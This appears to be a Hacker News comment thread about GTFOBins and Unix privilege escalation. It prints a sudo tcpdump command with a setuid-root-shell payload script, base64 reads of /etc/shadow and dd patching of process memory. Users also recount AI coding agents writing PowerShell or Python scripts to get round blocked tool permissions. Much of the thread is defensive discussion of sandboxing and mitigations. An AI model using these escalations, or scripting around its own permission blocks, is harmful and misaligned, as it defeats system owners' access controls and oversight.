Seeing the confusion in the comments I want to provide some examples of situations where this might come up in a security or CTF context:
* You have a restricted shell or other way to execute a restricted set of commands or binaries, often with arbitrary parameters. You can use GTFOBins in interesting ways to read files, write files, or even execute commands and ultimately break out of your restricted context into a shell.
* Someone allowed sudo access or set the SUID bit on a GTFOBin. Using these tricks, you may be able to read or write sensitive files or execute privileged commands in a way the person configuring sudo did not know about.
This is pretty relevant for things like claude-code, which has a fairly rudimentary way of dealing with permissions, via block-lists and allow-lists.
I once accidentally gave my Claude "powershell" permissions in one session, and after that, any time it found itself blocked from using a tool, e.g. git, it would write a PowerShell script that did the same thing and execute the script to work around the blocked permission.
Obviously no sane system would have "powershell" in a generic allow-list, but you could imagine some discrepancy in allowed levels between tools which can be worked around with the techniques on this page.
PowerShell or Python scripts to work around restrictions are the go-to for LLMs.
And it doesn't stop there.
Yesterday I was trying to figure out an icon issue in KDE Plasma (I know nothing about KDE). Both Claude and Codex would run complex D-Bus and debug queries and write and execute QML scripts, with more and more tools thrown into the mix.
There's no way to properly block them with just allow-lists and block-lists.
> There's no way to properly block them with just allow-lists and block-lists.
Especially not when some harnesses rely on the LLM itself to determine what's allowed or not: pretty much telling it "You shouldn't do thing X" and then asking the LLM to evaluate whether it should be able to do something when it comes up. Bananas.
The only right and productive way to run an agent on your computer is to isolate it properly somehow and then run it with "--sandbox danger-full-access --dangerously-bypass-approvals-and-sandbox" or whatever. I myself use Docker containers, but there are lots of solutions out there.
You have to be extremely careful when you set up a dev container, lock down file access, do not give the agent the power to start other containers or "docker compose up", restrict network access to an allow-list etc. Just running the agent in a container does little to protect you. (Maybe you know this, but a lot of people don't!)
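To make the cautions above concrete, a locked-down invocation might look something like the sketch below. The image name and mount layout are assumptions, and this is not a complete policy; the key point is what is absent, namely any mount of /var/run/docker.sock, which is exactly the "start other containers" hole.

```shell
docker run --rm -it \
  --network none \
  --read-only --tmpfs /tmp \
  --cap-drop ALL \
  --security-opt no-new-privileges \
  --pids-limit 256 --memory 4g \
  -v "$PWD/project:/work" -w /work \
  agent-sandbox:latest
```

`--network none` is the blunt version; a proxy-only network with a domain allow-list is the more workable variant for agents that need package registries.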
Most of those things happen by default. Sure, be careful, but the defaults are secure enough to prevent most potential issues. There's no need to lock down file access, for example: by default the agent only has access to files inside the container, and of course by default containers can't start other containers, and so on.
Good word of caution though, make sure you actually isolate when you set out to isolate something :)
At a previous employer, they blocked the chmod command, so I got into the habit of running python -c "import os; os.chmod('my_file', 0o744)".
Glad to see LLMs re-discover this trick.
> to see LLM re-discover
I imagine someone probably wrote very specifically about it in the training data that underwent lossy compression, and the LLM is decompressing that how-to.
So I'd say it's more like "surfacing" or "retrieving" than "re-discovering".
They scraped everything on Stackoverflow, likely IRC logs from Freenode, and every book written in the modern era courtesy of Sci-Hub / Library Genesis / Anna's Archive / Z Library.
RIP Aaron Swartz, they're generating trillions in shareholder value from the spiritual successors to the work they were going to imprison you for.
Indeed, I checked and the solution was already on Stack Overflow: https://askubuntu.com/a/1483248
For the LLM it's a probabilistic set of strings that achieves the outcome: the highest-probability set didn't work, so try the next one until success or a threshold is met. A human sees the implicit difference (the obvious thing not working suggests someone doesn't want you to do it), but an LLM, unless guided, doesn't see that subtext.
So chmod +x file didn't work; now try python -c "import os; os.chmod('file', 0o744)"
Humans and LLMs both only see that when given the right context. A tool not working in a corporate environment may be anything from an oversight or a malfunction all the way to a deliberate security block. Knowing which one it is takes a lot of implicit knowledge. Most people fail to provide this level of context to their LLMs and then wonder why they act so generic. But they are trained to act in the most generic way unless given context that would make them deviate from it.
> * Someone allowed sudo access or set the SUID bit on a GTFOBin. Using these tricks, you may be able to read or write sensitive files or execute privileged commands in a way the person configuring sudo did not know about.
Some enterprise security software designed to "mediate privilege elevation" includes an allowlist configured by the administrators. My experience seeing this rolled out at one company was that software on the allowlist no longer required a password to run with `sudo`. The list initially included, of course, all kinds of broadly useful software (e.g., vim, bash).
I worked from home at this company, and I remember thinking that was a good thing, because this software deployed to "secure" my computer made it drastically more vulnerable to someone walking up and running something if I stepped away from the keyboard for a moment and forgot to lock it.
Concrete example:
A few years back, our support team needed to do some network captures with tcpdump. The quick and natural way to allow that was to add a sudo rule for it, with unrestricted arguments (I knew it was a bit risky, but the TCP port and NIC could change).
Looks good enough? Well, no...
With tcpdump, you can specify a compress command with the "-z" option, and nothing prevents you from passing a "special" compress command and completely taking over the server:
> sudo tcpdump -i any -z '/home/despicable_me/evil_cmd.sh' -w /tmp/dontcare.pcap -G 1 -Z root
This seems trivial, but it's the kind of thing that is really easy to miss. Even if, these days, security layers like AppArmor mitigate this risk (causing a few headaches along the way), it's still relatively easy to mess up.
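For illustration, the payload script in that command line could be as small as this (the filename and drop location are hypothetical; tcpdump, running as root because of -Z root, invokes it after each rotation with the capture file as $1):

```shell
#!/bin/sh
# evil_cmd.sh -- hypothetical payload run by `tcpdump ... -z` as root.
# We ignore the capture file argument and plant a setuid shell instead.
cp /bin/sh /tmp/rootsh
chmod u+s /tmp/rootsh
```

Anyone on the box can then run /tmp/rootsh to get a root shell, long after the capture has finished.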
And here I thought this is a curated list so AI can learn how to bypass sandboxes.
> restic - Shell, Command, Upload
Well, now I feel a little vindicated tinkering so that my backup wouldn't run as root. Instead it runs as a regular user with read-all-files capabilities [0] and no login shell.
Of course, that's still probably overkill on my desktop, and any attacker that got that far would still be able to read basically every file on the computer and sneak backdoors into the backup...
[0] https://man7.org/linux/man-pages/man7/capabilities.7.html
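One way to wire that up is a systemd unit that grants only the file-read capability. The unit below is a sketch; the user name and paths are assumptions, not from the original setup.

```ini
[Service]
User=backup
Group=backup
# Read any file without being root; no other root powers.
AmbientCapabilities=CAP_DAC_READ_SEARCH
CapabilityBoundingSet=CAP_DAC_READ_SEARCH
NoNewPrivileges=yes
ExecStart=/usr/local/bin/restic backup /home
```

CAP_DAC_READ_SEARCH bypasses read and search permission checks but nothing else, so a compromised backup process can read files yet not modify them or escalate further.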
It does seem like an LLM's ability to see a constraint and just say "I'll write a quick helper to work around it" kinda wrecks some older-world assumptions. We know how to deal with remote human attackers, remote bot attackers, and to some extent local human attackers, but local self-coding bot attackers need more attention than they used to get. It's not even the same category as malware.
I’ve been guilty myself of building containers where everything runs as root on the assumption that the container was the relevant domain
If LLMs are involved, I can’t tell whether OS level security is suddenly more relevant, or suddenly utterly obsolete
I am confused. Is this saying that if you don't have access to `cat`, instead of `cat /path/to/input-file` you can use `base64 /path/to/input-file | base64 --decode`?
Or is it saying that `base64 /path/to/input-file | base64 --decode` can bypass read file permission flags?
The first thing. Invoked processes inherit the permissions of the user who invoked them (unless they have the setuid bit). It's just in case you land access to a computer which has all the standard Unix tools disabled to stop attackers from lateral movement.
Why would you bother even doing that?
If someone has the power to execute commands, they are already on the other side of the airtight hatch.
https://devblogs.microsoft.com/oldnewthing/20240102-00/?p=10...
Put your meagre and limited resources on keeping them outside the hatch.
If they get through the hatch, that is where you fucked up, not that you didn't remove every conceivable command from yourself should they get through. If they can remotely get some program to execute a shell, they can quite conceivably get the same program to just read them the files directly by writing different shellcode. Running a shell is just a convenience for them.
The number of setups that are insecure enough to allow remote shells by arbitrary attackers, but are secure because you disabled /bin/cat once they get in, is zero.
It's the principle of 'Defence in Depth'. Do both, as one control may fail.
Security is done in layers. Yes, we do our best to keep adversaries outside the proverbial hatch. But even inside the hatch, the principle of least privilege is important in reducing the damage of attacks.
Typically you do things like this to either work in restricted envs (distroless) or to evade detection logic. It's not about bypassing a boundary, it's about getting things done in the env you have available.
This is saying that restricting privileges by blacklisting commands does not work (and never has).
Cool, so it is what I imagined, thanks!
It's the former. Not bypassing permissions but in shells that might be highly restricted to just a couple commands. Like others have said, very very common in CTFs.
Wouldn't a tar pipe be even lighter?
I just grabbed one of the examples there which was readable and didn't require the reader to know all the extra flags passed. One that would illustrate the purpose of the website. One that Linux newbies who read the question and further answers here could follow along with. Not one that tried to be optimal.
Depends on what you have access to / what's misconfigured.
If there's a file your user does not have read access to, but you have the ability to run the `base64` binary as root, you can run `base64` as root (thus encoding the file contents as base64), then pipe the output to another base64 process to decode the file contents.
So yes, the end result is just `cat` with extra steps.
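Concretely, the round-trip is lossless, so whatever the privileged `base64` can read comes back verbatim. The sudo rule is the hypothetical misconfiguration; the mechanics themselves need no privileges, so the demo below uses an ordinary file as a stand-in:

```shell
# Stand-in for a root-only file, so the demo runs unprivileged:
printf 'db_password=hunter2\n' > /tmp/demo_secret
base64 /tmp/demo_secret | base64 --decode   # prints: db_password=hunter2
# With a sudo rule for base64, the same pipeline reads any file:
#   sudo base64 /etc/shadow | base64 --decode
```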
The last time I used anything similar to this was circa 1995 at secondary school, using Windows 3.11 computers that had been set up so you could only launch a small number of authorised applications.
One of those was Word.
In Word you could write macros and use shell to launch other applications.
Suddenly the locked down computer that exposed a handful of applications could run anything (well anything a Windows 3.11 machine in 1995 could run).
It was quite exciting at the time; I don't feel like I have hit the same sort of issues since. Occasionally I see people say that some touch-screen information displays (in shops/shopping centres etc.) have ways to escape from kiosk mode (locked to an app) so you can use them for anything. I guess that is similar.
Haha, as a former maintainer to one of these tools, it makes me laugh to see someone pop a shell. Creative, nice work, nice resource.
Wouldn't it be useful to show ways to mitigate these bypasses?
For example, getting a shell with more:
- Setting SHELL to /bin/false before invoking more
- Switching to less in secure mode
- If using more with sudo: the NOEXEC flag
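As a sketch, the sudoers variant of that last mitigation might look like this (the user name and log path are hypothetical):

```ini
# /etc/sudoers.d/pager -- let support page logs as root, but NOEXEC
# stops more/less from spawning a shell via the ! escape.
support ALL = (root) NOEXEC: /usr/bin/more /var/log/*
```

NOEXEC works by blocking the pager's exec() calls, so the !command escape fails even though the pager itself still runs as root.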
Very neat, definitely some creative approaches in there I didn't expect like `yt-dlp`. Maybe I shouldn't have that just sitting around :)
I have used this extensively while playing on hackthebox.eu
I'm not sure I get it. base64 is on the list. That can't do anything but read a file to which the user already has access, I think. Am I mistaken or does "a curated list of Unix-like executables that can be used to bypass local security restrictions in misconfigured systems" not mean what I think it does?
I think the idea is that if you're given an improperly configured restricted shell/command access, you can use any of the listed tools to gain access to some subset of what that user would normally have access to in an unrestricted environment.
A very simple version of this would be if you set a user's default shell to "rbash" but the user can just run "bash" to get a real shell.
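For instance, with restricted bash (`bash -r` behaves like rbash): cd, redirections, and commands containing a slash are blocked, but launching a plain `bash` found on PATH is not, because "bash" contains no slash:

```shell
# Restricted mode refuses cd...
bash -r -c 'cd /tmp'                    # fails: "cd: restricted"
# ...but spawning an unrestricted child shell works:
bash -r -c 'bash -c "cd /tmp && pwd"'   # prints: /tmp
```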
Maybe sudoers is configured to allow you to run base64 as root. Why would someone do this? No idea. But if you are in such a situation, now you know how to bypass the intended permissions and read any file on the system.
Or maybe you give Claude Code permission to run `base64` without review without realizing this lets it read any file, including maybe your secrets in .env or something.
But you would already have to have shell access to the system to execute those commands, right?
...or something that runs CGI commands. Bash scripts are like the glue of the internet, and many of them are poorly-written. Tons of stuff still runs on PHP or relies on little Python cron jobs behind the scenes. A lot of the way this stuff works depends on being able to chain vulns together...an unescaped query to a database that gets piped to a nightly cron job to sync or backup something becomes an attack vector.
But that sort of access is only a social engineer away. People still click on stuff in emails, or run commands because a computer says so.
You might have sudo access to mtr, allowing you to traceroute as root but not launch a shell or read files. But with these tools you can escalate.
Like it says in the preamble on the site, don't think of this as a collection of exploits, but rather as a compendium of knowledge about escalation techniques for use in emergencies.
I can't tell you how many times I burned my fingers as a young Unix developer in the '80s by untar'ing things wrongly or fat-fingering an 'rm -rf /', leaving a running system that would be catastrophic if I didn't fix it before reboot, shell still active and... what to do? Consult this list of great advice and use it to rebuild the system and/or do things that need to be done that otherwise wouldn't be possible.
GTFOBins is not just for hacking. It's also for system repair and recovery. I'd be as likely to consult this knowledge base after a hacker attack as before one, if not more.
Not just shell access, but the server would need to be configured to also enable your user to run any of these binaries as root (such as an administrator putting them in the sudoers file).
So they're a pretty niche attack vector, and oftentimes crop up as a result of lazy/incompetent sysadmins.
As someone who has had to do some GRUB editing on the computer in an Airbnb because the peripherals were all messed up on the guest account (no internet, no sound, you could only see a tiny part of the screen; I honestly don't know how they had managed to do it), I am super pleased to see this resource. Stuff like this is a bit, you know, hopefully-you-never-need-it, but when you do, it is so useful to have.
they should finetune the LLMs with this
LLMs know pretty well about this. This is just a handy list for humans that want to do stuff.
OK, it has hundreds of examples covering all sorts of tools: 7z, dig, git. Those are very popular.
Question from a security newbie: why isn't this used to hack all sorts of servers all the time, then?
You need initial access. This is just a list of tools you can use if you can't spawn a standard interactive shell, for whatever reason.
It doesn't make it easier to "hack" servers, it's just a list of things that you could use once you're already inside.
I think Docker was used for these things before. I remember some big service had secrets in env vars, and shell access inside the Docker image gained from an npm post-install script let attackers exfiltrate those secrets.
It's only relevant as a privilege escalation vector when you're able to execute those programs as root, but don't otherwise have root access on the server.
It's a pretty niche circumstance. Unless an admin allows users on a server to execute some of these random types of binaries as root, it's not going to be a concern. And, if it wasn't already obvious, distros are almost never configured this way OOTB
I've seen plenty of servers in companies configured to allow sudoers to run a restricted subset of binaries as root, usually without a password. Some of them were GTFObins that the admins were not aware of until I reached out to let them know. I've also seen a couple of restricted shell setups where users could only run a handful of commands. Can't recall if I checked to see if any of them were GTFObins.
I wouldn't say this is the most useful h4x0r tool ever, but I wouldn't say it's particularly niche, either. This kinda stuff is definitely relevant in older large enterprise-type Linux/Unix environments.
Because you have to have shell access to the server to use any of these.
In certain circumstances, they might be :-)
But you can't "hack a server" using just these techniques: they would be a (small) part of a chain of exploits.
These come up in CTFs all the time. One trick I don't see here is you can use `dd` to write into the `/proc` hierarchy to achieve all sorts of fuckery including patching shellcode into a running process.
You learn the most random ways to abuse program features. One I still remember, because of how long it took to figure out, was an HTB box that (after a long exploitation path) used NTFS ADS to hide the flag in the alternate stream of a decoy file; and of course the normal way to extract the stream was disabled, so I had to do some black magic with other binaries to get it.
I don't think I've used any of these in a CTF tbh
I've definitely used one or two in the last 6 months
For what kind of challenge? Most of these are not even available in CTF environments
I've used them for pwncollege CTFs but pwncollege is way below your level (I've seen some of your write ups before).
Huh? How does that work exactly? I've heard of /proc fuckery before but didn't know you could disable aslr with it.
If you have /proc available, you don't even need to disable ASLR (all mappings are available to you)
Hey you know what, I've used dd to write into process memory but haven't actually used it to disable KASLR, so it's possible I am misremembering. My bad.
:(
Sounds super 1337 and I hope it's actually possible somehow.
Parse /proc/<pid>/maps to find the relevant target_addr in your process-under-attack, and then it's a matter of:
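A sketch of that dd step follows. The /proc form needs ptrace permission over the target (or root), and pid and target_addr are placeholders, so the runnable demo below uses a regular file to show the same write-at-offset mechanics:

```shell
# The real trick (placeholders, privileged):
#   dd if=payload.bin of=/proc/$pid/mem bs=1 seek=$target_addr conv=notrunc
# Same mechanics on a plain file: overwrite bytes in place at a chosen
# offset, without truncating the rest.
printf 'ORIGINAL' > /tmp/demo_mem
printf 'XX' | dd of=/tmp/demo_mem bs=1 seek=2 conv=notrunc 2>/dev/null
cat /tmp/demo_mem   # prints: ORXXINAL
```

With bs=1 the seek offset is counted in bytes, which is what lets it double as a virtual address when the output file is /proc/<pid>/mem.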
See also: DDexec (https://github.com/arget13/DDexec)
The problem is ambient authority, which is UNIX's security model.
Systems with capability-based security, such as seL4[0], do not suffer from this category of problem.
0. https://sel4.systems/About/
See also:
LOLBAS (https://lolbas-project.github.io/)